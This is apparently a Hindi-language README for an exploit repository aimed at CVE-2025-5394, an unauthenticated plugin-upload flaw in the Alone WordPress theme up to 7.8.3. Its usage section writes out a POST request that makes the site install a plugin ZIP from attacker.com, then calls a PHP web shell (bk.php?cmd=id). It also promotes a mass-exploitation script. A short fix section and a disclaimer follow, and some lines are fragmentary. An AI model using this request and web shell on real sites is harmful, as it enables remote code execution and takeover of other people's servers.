
Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - प्राधिकरण की कमी से अप्रमाणित मनमाना फ़ाइल अपलोड via Plugin Installation
🔥 कमजोरी का सारांश
WordPress थीम Alone संस्करण <= 7.8.3 एक अप्रमाणित मनमाना फ़ाइल अपलोड कमजोरी के प्रति संवेदनशील है। यह दोष अप्रमाणित हमलावरों को एक असुरक्षित AJAX एंडपॉइंट के माध्यम से रिमोट URL से मनमाने प्लगइन ZIP फ़ाइलों को अपलोड और इंस्टॉल करने की अनुमति देता है — जिसके परिणामस्वरूप बैकडोर्ड प्लगइन्स तैनात करके रिमोट कोड निष्पादन (RCE) होता है।
यह कमजोरी beplus_import_pack_install_plugin फ़ंक्शन से उत्पन्न होती है जो बिना किसी प्रमाणीकरण या क्षमता जांच के wp_ajax_nopriv_ के माध्यम से सार्वजनिक रूप से उजागर होती है। यह फ़ंक्शन उपयोगकर्ता द्वारा प्रदान किए गए URL से एक प्लगइन स्थापित और सक्रिय करता है।
🔍 प्रभावित थीम
🧪 एक्सप्लॉइट विशेषताएँ
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 शोधकर्ता
🚀 उपयोग
अपने नियंत्रण वाले सर्वर पर होस्ट की गई एक दुर्भावनापूर्ण प्लगइन ZIP फ़ाइल तैयार करें।
Plugin Name:) और PHP बैकडोर (जैसे, bk.php) होना चाहिए।निम्नलिखित POST अनुरोध तैयार करें:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
यदि सफल होता है, तो प्लगइन स्थापित और सक्रिय हो जाता है। अपने शेल तक पहुँचें:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 सामूहिक शोषण स्क्रिप्ट इस रिपॉजिटरी में एक सामूहिक शोषण उपकरण शामिल है जिसमें:
result.txt में लाइव लॉगिंगविवरण के लिए mass_beplus_exploit.py देखें।
🛠 सुधार सिफारिशें
wp_ajax_nopriv_beplus_import_pack_install_plugin हुक को हटाना या सुरक्षित करना चाहिए।current_user_can('install_plugins'))🔒 अस्वीकरण:
यह जानकारी केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच या उपयोग अवैध और अनैतिक है।
📚 संदर्भ:
CVE: CVE-2025-5394
शोधकर्ता: Thai An